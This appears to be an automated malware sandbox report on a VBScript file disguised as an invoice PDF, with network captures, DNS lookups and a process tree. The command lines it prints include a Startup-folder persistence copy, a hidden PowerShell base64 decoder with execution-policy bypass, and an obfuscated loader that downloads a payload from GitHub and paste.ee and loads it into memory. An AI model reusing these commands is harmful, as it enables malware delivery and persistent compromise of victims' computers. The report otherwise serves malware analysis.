                                                    Oct 4, 2024 11:25:22.883378029 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.883404970 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.883445978 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.883886099 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.883934021 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.883976936 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.883985043 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.884018898 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.884455919 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.884478092 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.884527922 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.884535074 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.884568930 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.884591103 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.885272980 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.885293961 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.885344028 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.885350943 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.885375977 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.885400057 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.885565996 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.885585070 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.885629892 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.885638952 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.885663033 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.885677099 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.886233091 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.886250973 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.886291027 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.886300087 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.886329889 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.886348009 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.887120008 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.887140989 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.887187004 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.887193918 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.887223959 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.887245893 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.887628078 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.887648106 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.887692928 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.887700081 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.887733936 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.887756109 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.974447012 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.974478006 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.974520922 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.974531889 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.974550962 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.974565029 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.974824905 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.974850893 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.974889994 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.974895954 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.974937916 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.974937916 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.975616932 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.975647926 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.975676060 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.975687027 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.975702047 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.975728035 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.976108074 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.976129055 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.976159096 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.976169109 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.976187944 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.976200104 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.976731062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.976752043 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.976792097 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.976799965 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.976835012 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.977309942 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.977328062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.977368116 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.977375031 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.977406979 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.978100061 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978121042 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978154898 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.978161097 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978190899 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.978661060 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978682041 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978725910 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:22.978734970 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:22.978792906 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065350056 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065408945 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065438032 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065459967 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065471888 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065493107 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065680027 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065701008 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065730095 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065736055 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.065764904 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.065783978 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066488028 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.066513062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.066541910 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066549063 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.066571951 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066591024 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.066984892 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067003965 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067037106 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067042112 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067070961 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067087889 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067609072 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067630053 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067666054 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067672968 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.067694902 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.067711115 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.068304062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.068324089 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.068356991 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.068362951 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.068388939 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.068403006 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.069081068 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069112062 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069155931 CEST49707443192.168.2.8185.199.108.133
                                                    Oct 4, 2024 11:25:23.069161892 CEST44349707185.199.108.133192.168.2.8
                                                    Oct 4, 2024 11:25:23.069194078 CEST49707443192.168.2.8185.199.108.133
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Oct 4, 2024 11:25:20.329804897 CEST | 50751 | 53 | 192.168.2.8 | 1.1.1.1
                                                    Oct 4, 2024 11:25:20.339495897 CEST | 53 | 50751 | 1.1.1.1 | 192.168.2.8
                                                    Oct 4, 2024 11:25:23.254899979 CEST | 58274 | 53 | 192.168.2.8 | 1.1.1.1
                                                    Oct 4, 2024 11:25:23.262398005 CEST | 53 | 58274 | 1.1.1.1 | 192.168.2.8
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Oct 4, 2024 11:25:20.329804897 CEST | 192.168.2.8 | 1.1.1.1 | 0x25cb | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
                                                    Oct 4, 2024 11:25:23.254899979 CEST | 192.168.2.8 | 1.1.1.1 | 0xb8c0 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Oct 4, 2024 11:25:20.339495897 CEST | 1.1.1.1 | 192.168.2.8 | 0x25cb | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                                                    Oct 4, 2024 11:25:20.339495897 CEST | 1.1.1.1 | 192.168.2.8 | 0x25cb | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                                                    Oct 4, 2024 11:25:20.339495897 CEST | 1.1.1.1 | 192.168.2.8 | 0x25cb | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                                                    Oct 4, 2024 11:25:20.339495897 CEST | 1.1.1.1 | 192.168.2.8 | 0x25cb | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                                                    Oct 4, 2024 11:25:23.262398005 CEST | 1.1.1.1 | 192.168.2.8 | 0xb8c0 | No error (0) | paste.ee | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                    Oct 4, 2024 11:25:23.262398005 CEST | 1.1.1.1 | 192.168.2.8 | 0xb8c0 | No error (0) | paste.ee | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                    • raw.githubusercontent.com
                                                    • paste.ee
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.8 | 49707 | 185.199.108.133 | 443 | 4844 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-04 09:25:20 UTC | 128 | OUT | GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                    Host: raw.githubusercontent.com
                                                    Connection: Keep-Alive
                                                    2024-10-04 09:25:20 UTC | 901 | IN | HTTP/1.1 200 OK
                                                    Connection: close
                                                    Content-Length: 2935468
                                                    Cache-Control: max-age=300
                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                    Content-Type: text/plain; charset=utf-8
                                                    ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                    Strict-Transport-Security: max-age=31536000
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: deny
                                                    X-XSS-Protection: 1; mode=block
                                                    X-GitHub-Request-Id: DDDE:3E1F9D:6A875A:733786:66FFB31C
                                                    Accept-Ranges: bytes
                                                    Date: Fri, 04 Oct 2024 09:25:20 GMT
                                                    Via: 1.1 varnish
                                                    X-Served-By: cache-ewr-kewr1740060-EWR
                                                    X-Cache: HIT
                                                    X-Cache-Hits: 0
                                                    X-Timer: S1728033921.910232,VS0,VE8
                                                    Vary: Authorization,Accept-Encoding,Origin
                                                    Access-Control-Allow-Origin: *
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    X-Fastly-Request-ID: 90164266a26d328bfd5cf00286eeab706ea78bfe
                                                    Expires: Fri, 04 Oct 2024 09:30:20 GMT
                                                    Source-Age: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.8 | 49709 | 188.114.96.3 | 443 | 4844 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-04 09:25:23 UTC | 67 | OUT | GET /d/DjfVC/0 HTTP/1.1
                                                    Host: paste.ee
                                                    Connection: Keep-Alive
                                                    2024-10-04 09:25:23 UTC | 616 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 04 Oct 2024 09:25:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Frame-Options: SAMEORIGIN
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sHMJjbCJlP4B3AeEfBXFiQcGbKaGp9h%2Bzd2meQmMab%2BanM02ko1bg62WFCEgJyt%2BWCtC4iEDMsyY%2FHuJOEcZkWHHgvQnjmB2EMJmFEjIOSx00HqAco6HdUSOpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                    Server: cloudflare
                                                    CF-RAY: 8cd41fd7dc8e42c4-EWR
                                                    alt-svc: h3=":443"; ma=86400


                                                    Target ID: 0
                                                    Start time: 05:25:06
                                                    Start date: 04/10/2024
                                                    Path: C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit): false
                                                    Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"
                                                    Imagebase: 0x7ff7f6200000
                                                    File size: 170'496 bytes
                                                    MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges: false
                                                    Has administrator privileges: false
                                                    Programmed in: C, C++ or other language
                                                    Reputation: high
                                                    Has exited: true

                                                    Target ID: 2
                                                    Start time: 05:25:07
                                                    Start date: 04/10/2024
                                                    Path: C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit): false
                                                    Commandline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
                                                    Imagebase: 0x7ff655e20000
                                                    File size: 289'792 bytes
                                                    MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges: false
                                                    Has administrator privileges: false
                                                    Programmed in: C, C++ or other language
                                                    Reputation: high
                                                    Has exited: true

                                                    Target ID:3
                                                    Start time:05:25:07
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:05:25:07
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\PING.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:ping 127.0.0.1 -n 10
                                                    Imagebase:0x7ff6f3390000
                                                    File size:22'528 bytes
                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:05:25:16
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:05:25:18
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:05:25:18
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:05:25:18
                                                    Start date:04/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true
